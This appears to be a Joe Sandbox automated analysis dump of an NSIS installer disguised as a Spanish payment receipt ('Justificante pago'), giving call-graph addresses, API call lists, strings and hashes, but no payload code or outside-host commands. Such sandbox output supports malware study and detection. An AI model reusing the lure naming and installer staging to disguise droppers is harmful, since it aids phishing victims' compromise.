DeleteFileW 3835->3836 3837 4039d0 CopyFileW 3836->3837 3842 40398f 3836->3842 3837->3842 3838 403a1a 3840 4062c7 36 API calls 3838->3840 3839 4062c7 36 API calls 3839->3842 3840->3789 3841 406544 17 API calls 3841->3842 3842->3835 3842->3838 3842->3839 3842->3841 3843 405aea 2 API calls 3842->3843 3844 403a04 CloseHandle 3842->3844 3843->3842 3844->3842 3845->3770 3846->3772 3848 40678e 5 API calls 3847->3848 3849 4034d2 3848->3849 3850 4034dc 3849->3850 3851 405dd6 3 API calls 3849->3851 3850->3778 3852 4034e4 3851->3852 3853 405ab5 2 API calls 3852->3853 3854 4034ea 3853->3854 3953 406026 3854->3953 3957 405ff7 GetFileAttributesW CreateFileW 3857->3957 3859 4030bd 3860 4030cd 3859->3860 3958 406507 lstrcpynW 3859->3958 3860->3788 3862 4030e3 3863 405e22 2 API calls 3862->3863 3864 4030e9 3863->3864 3959 406507 lstrcpynW 3864->3959 3866 4030f4 GetFileSize 3881 4031ee 3866->3881 3884 40310b 3866->3884 3868 4031f7 3868->3860 3870 403227 GlobalAlloc 3868->3870 3972 4034af SetFilePointer 3868->3972 3869 403499 ReadFile 3869->3884 3971 4034af SetFilePointer 3870->3971 3872 40325a 3874 403019 6 API calls 3872->3874 
3874->3860 3875 403210 3877 403499 ReadFile 3875->3877 3876 403242 3878 4032b4 35 API calls 3876->3878 3879 40321b 3877->3879 3882 40324e 3878->3882 3879->3860 3879->3870 3880 403019 6 API calls 3880->3884 3960 403019 3881->3960 3882->3860 3882->3882 3883 40328b SetFilePointer 3882->3883 3883->3860 3884->3860 3884->3869 3884->3872 3884->3880 3884->3881 3886 4068d4 5 API calls 3885->3886 3887 403bca 3886->3887 3888 403bd0 3887->3888 3889 403be2 3887->3889 3981 40644e wsprintfW 3888->3981 3890 4063d5 3 API calls 3889->3890 3891 403c12 3890->3891 3893 403c31 lstrcatW 3891->3893 3895 4063d5 3 API calls 3891->3895 3894 403be0 3893->3894 3973 403e8c 3894->3973 3895->3893 3898 405ede 18 API calls 3899 403c63 3898->3899 3900 403cf7 3899->3900 3902 4063d5 3 API calls 3899->3902 3901 405ede 18 API calls 3900->3901 3903 403cfd 3901->3903 3904 403c95 3902->3904 3905 403d0d LoadImageW 3903->3905 3906 406544 17 API calls 3903->3906 3904->3900 3909 403cb6 lstrlenW 3904->3909 3913 405e03 CharNextW 3904->3913 3907 403db3 3905->3907 3908 403d34 RegisterClassW 3905->3908 3906->3905 3912 40140b 2 API calls 3907->3912 3910 403dbd 3908->3910 3911 403d6a SystemParametersInfoW CreateWindowExW 3908->3911 3914 403cc4 lstrcmpiW 3909->3914 3915 403cea 3909->3915 3910->3789 3911->3907 3916 403db9 3912->3916 3917 403cb3 3913->3917 3914->3915 3918 403cd4 GetFileAttributesW 3914->3918 3919 405dd6 3 API calls 3915->3919 3916->3910 3922 403e8c 18 API calls 3916->3922 3917->3909 3921 403ce0 3918->3921 3920 403cf0 3919->3920 3982 406507 lstrcpynW 3920->3982 3921->3915 3925 405e22 2 API calls 3921->3925 3923 403dca 3922->3923 3926 403dd6 ShowWindow 3923->3926 3927 403e59 3923->3927 3925->3915 3928 406864 3 API calls 3926->3928 3929 40563c 5 API calls 3927->3929 3930 403dee 3928->3930 3931 403e5f 3929->3931 3934 403dfc GetClassInfoW 3930->3934 3936 406864 3 API calls 3930->3936 3932 403e63 3931->3932 3933 403e7b 3931->3933 3932->3910 3939 40140b 2 API calls 3932->3939 3935 40140b 2 API calls 3933->3935 
3937 403e10 GetClassInfoW RegisterClassW 3934->3937 3938 403e26 DialogBoxParamW 3934->3938 3935->3910 3936->3934 3937->3938 3940 40140b 2 API calls 3938->3940 3939->3910 3940->3910 3941->3776 3942->3824 3943->3791 3944->3831 3945->3842 3947 403af4 3946->3947 3948 403ae6 CloseHandle 3946->3948 3984 403b21 3947->3984 3948->3947 3951 405c13 67 API calls 3952 403a28 OleUninitialize 3951->3952 3952->3798 3952->3799 3954 406033 GetTickCount GetTempFileNameW 3953->3954 3955 4034f5 3954->3955 3956 406069 3954->3956 3955->3778 3956->3954 3956->3955 3957->3859 3958->3862 3959->3866 3961 403022 3960->3961 3962 40303a 3960->3962 3963 403032 3961->3963 3964 40302b DestroyWindow 3961->3964 3965 403042 3962->3965 3966 40304a GetTickCount 3962->3966 3963->3868 3964->3963 3967 406910 2 API calls 3965->3967 3968 403058 CreateDialogParamW ShowWindow 3966->3968 3969 40307b 3966->3969 3970 403048 3967->3970 3968->3969 3969->3868 3970->3868 3971->3876 3972->3875 3974 403ea0 3973->3974 3983 40644e wsprintfW 3974->3983 3976 403f11 3977 403f45 18 API calls 3976->3977 3979 403f16 3977->3979 3978 403c41 3978->3898 3979->3978 3980 406544 17 API calls 3979->3980 3980->3979 3981->3894 3982->3900 3983->3976 3985 403b2f 3984->3985 3986 403af9 3985->3986 3987 403b34 FreeLibrary GlobalFree 3985->3987 3986->3951 3987->3986 3987->3987 4471 401b77 4472 402da6 17 API calls 4471->4472 4473 401b7e 4472->4473 4474 402d84 17 API calls 4473->4474 4475 401b87 wsprintfW 4474->4475 4476 402c2a 4475->4476 4477 40167b 4478 402da6 17 API calls 4477->4478 4479 401682 4478->4479 4480 402da6 17 API calls 4479->4480 4481 40168b 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401694 MoveFileW 4482->4483 4484 4016a7 4483->4484 4490 4016a0 4483->4490 4485 4022f6 4484->4485 4486 40683d 2 API calls 4484->4486 4488 4016b6 4486->4488 4487 401423 24 API calls 4487->4485 4488->4485 4489 4062c7 36 API calls 4488->4489 4489->4490 4490->4487 4491 406bfe 4492 406a82 4491->4492 4493 4073ed 4492->4493 4494 406b03 GlobalFree 
4492->4494 4495 406b0c GlobalAlloc 4492->4495 4496 406b83 GlobalAlloc 4492->4496 4497 406b7a GlobalFree 4492->4497 4494->4495 4495->4492 4495->4493 4496->4492 4496->4493 4497->4496 4498 4019ff 4499 402da6 17 API calls 4498->4499 4500 401a06 4499->4500 4501 402da6 17 API calls 4500->4501 4502 401a0f 4501->4502 4503 401a16 lstrcmpiW 4502->4503 4504 401a28 lstrcmpW 4502->4504 4505 401a1c 4503->4505 4504->4505 4506 4022ff 4507 402da6 17 API calls 4506->4507 4508 402305 4507->4508 4509 402da6 17 API calls 4508->4509 4510 40230e 4509->4510 4511 402da6 17 API calls 4510->4511 4512 402317 4511->4512 4513 40683d 2 API calls 4512->4513 4514 402320 4513->4514 4515 402331 lstrlenW lstrlenW 4514->4515 4516 402324 4514->4516 4518 405569 24 API calls 4515->4518 4517 405569 24 API calls 4516->4517 4519 40232c 4516->4519 4517->4519 4520 40236f SHFileOperationW 4518->4520 4520->4516 4520->4519 4521 401000 4522 401037 BeginPaint GetClientRect 4521->4522 4523 40100c DefWindowProcW 4521->4523 4525 4010f3 4522->4525 4526 401179 4523->4526 4527 401073 CreateBrushIndirect FillRect DeleteObject 4525->4527 4528 4010fc 4525->4528 4527->4525 4529 401102 CreateFontIndirectW 4528->4529 4530 401167 EndPaint 4528->4530 4529->4530 4531 401112 6 API calls 4529->4531 4530->4526 4531->4530 4532 401d81 4533 401d94 GetDlgItem 4532->4533 4534 401d87 4532->4534 4536 401d8e 4533->4536 4535 402d84 17 API calls 4534->4535 4535->4536 4537 401dd5 GetClientRect LoadImageW SendMessageW 4536->4537 4538 402da6 17 API calls 4536->4538 4540 401e33 4537->4540 4542 401e3f 4537->4542 4538->4537 4541 401e38 DeleteObject 4540->4541 4540->4542 4541->4542 4543 401503 4544 40150b 4543->4544 4546 40151e 4543->4546 4545 402d84 17 API calls 4544->4545 4545->4546 4547 402383 4548 40238a 4547->4548 4551 40239d 4547->4551 4549 406544 17 API calls 4548->4549 4550 402397 4549->4550 4552 405b67 MessageBoxIndirectW 4550->4552 4552->4551 4553 402c05 SendMessageW 4554 402c2a 4553->4554 4555 402c1f InvalidateRect 4553->4555 4555->4554 
3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4563 40290b 4564 402da6 17 API calls 4563->4564 4565 402912 FindFirstFileW 4564->4565 4566 40293a 4565->4566 4569 402925 4565->4569 4571 40644e wsprintfW 4566->4571 4568 402943 4572 406507 lstrcpynW 4568->4572 4571->4568 4572->4569 4573 40190c 4574 401943 4573->4574 4575 402da6 17 API calls 4574->4575 4576 401948 4575->4576 4577 405c13 67 API calls 
4576->4577 4578 401951 4577->4578 4579 40490d 4580 404943 4579->4580 4581 40491d 4579->4581 4583 4044ca 8 API calls 4580->4583 4582 404463 18 API calls 4581->4582 4584 40492a SetDlgItemTextW 4582->4584 4585 40494f 4583->4585 4584->4580 4586 40190f 4587 402da6 17 API calls 4586->4587 4588 401916 4587->4588 4589 405b67 MessageBoxIndirectW 4588->4589 4590 40191f 4589->4590 4591 401491 4592 405569 24 API calls 4591->4592 4593 401498 4592->4593 4594 402891 4595 402898 4594->4595 4597 402ba9 4594->4597 4596 402d84 17 API calls 4595->4596 4598 40289f 4596->4598 4599 4028ae SetFilePointer 4598->4599 4599->4597 4600 4028be 4599->4600 4602 40644e wsprintfW 4600->4602 4602->4597 4603 401f12 4604 402da6 17 API calls 4603->4604 4605 401f18 4604->4605 4606 402da6 17 API calls 4605->4606 4607 401f21 4606->4607 4608 402da6 17 API calls 4607->4608 4609 401f2a 4608->4609 4610 402da6 17 API calls 4609->4610 4611 401f33 4610->4611 4612 401423 24 API calls 4611->4612 4613 401f3a 4612->4613 4620 405b2d ShellExecuteExW 4613->4620 4615 401f82 4616 40292e 4615->4616 4617 40697f 5 API calls 4615->4617 4618 401f9f CloseHandle 4617->4618 4618->4616 4620->4615 4621 402f93 4622 402fa5 SetTimer 4621->4622 4623 402fbe 4621->4623 4622->4623 4624 403013 4623->4624 4625 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4623->4625 4625->4624 4626 401d17 4627 402d84 17 API calls 4626->4627 4628 401d1d IsWindow 4627->4628 4629 401a20 4628->4629 4630 404599 lstrcpynW lstrlenW 4014 401b9b 4015 401bec 4014->4015 4020 401ba8 4014->4020 4016 401c16 GlobalAlloc 4015->4016 4017 401bf1 4015->4017 4018 406544 17 API calls 4016->4018 4027 40239d 4017->4027 4035 406507 lstrcpynW 4017->4035 4022 401c31 4018->4022 4019 406544 17 API calls 4023 402397 4019->4023 4020->4022 4024 401bbf 4020->4024 4022->4019 4022->4027 4028 405b67 MessageBoxIndirectW 4023->4028 4033 406507 lstrcpynW 4024->4033 4025 401c03 GlobalFree 4025->4027 4028->4027 4029 401bce 4034 406507 lstrcpynW 4029->4034 4031 401bdd 4036 406507 
lstrcpynW 4031->4036 4033->4029 4034->4031 4035->4025 4036->4027 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4051 40259e 4062 402de6 4051->4062 4054 402d84 17 API calls 4055 4025b1 4054->4055 4056 4025d9 RegEnumValueW 4055->4056 4057 4025cd RegEnumKeyW 4055->4057 4060 40292e 4055->4060 4058 4025f5 RegCloseKey 4056->4058 4059 4025ee 4056->4059 4057->4058 4058->4060 4059->4058 4063 402da6 17 API calls 4062->4063 4064 402dfd 4063->4064 4065 406374 RegOpenKeyExW 4064->4065 4066 4025a8 4065->4066 4066->4054 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 
3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 
3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 
API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 
4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

Control-flow Graph

[Interactive basic-block graph residue for the entry routine at 004034F7 (the NSIS stub's main). The viewer colours each block executed or not executed; only the block start addresses and their API labels survive extraction. In block order: 4034f7 SetErrorMode, GetVersionExW (a second GetVersionExW at 403549); 4035ea lstrlenA (UXTHEME check); 40362d #17 (COMCTL32), OleInitialize, SHGetFileInfoW, GetCommandLineW; 403698 CharNextW command-line parsing loop; 4037c2 GetTempPathW; 4037de GetWindowsDirectoryW, lstrcatW fallback; 4037fe GetTempPathW, lstrcatW, SetEnvironmentVariableW twice; 403834 DeleteFileW; 403913 and 403929 lstrcatW (~nsu, .tmp); 403934 lstrcatW, lstrcmpiW; 403965 SetCurrentDirectoryW; 4039b3 DeleteFileW; 4039d0 CopyFileW; 403a04 CloseHandle; 403a23 OleUninitialize; 403a33 MessageBoxIndirectW (via 405b67) then ExitProcess; 403a50 GetCurrentProcess, OpenProcessToken; 403a67 LookupPrivilegeValueW, AdjustTokenPrivileges; 403ab2 ExitWindowsEx; 403ad3 ExitProcess.]
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 0040351A
• GetVersionExW.KERNEL32(?), ref: 00403543
• GetVersionExW.KERNEL32(0000011C), ref: 0040355A
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
• #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
• OleInitialize.OLE32(00000000), ref: 00403634
• SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
• GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000020,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000), ref: 004036A0
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
• DeleteFileW.KERNELBASE(1033), ref: 00403839
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 00403920
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 0040392F
  • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 0040393A
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 00403946
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
• DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Justificante pago-09453256434687.exe,00420EC8,00000001), ref: 004039D8
• CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
• OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403AD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
• String ID: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante pago-09453256434687.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 3859024572-1257580972
• Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
• Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
• Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
• Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Control-flow Graph (graph data not reproduced)

APIs
• GetDlgItem.USER32(?,00000403), ref: 00405706
• GetDlgItem.USER32(?,000003EE), ref: 00405715
• GetClientRect.USER32(?,?), ref: 00405752
• GetSystemMetrics.USER32(00000002), ref: 00405759
• SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
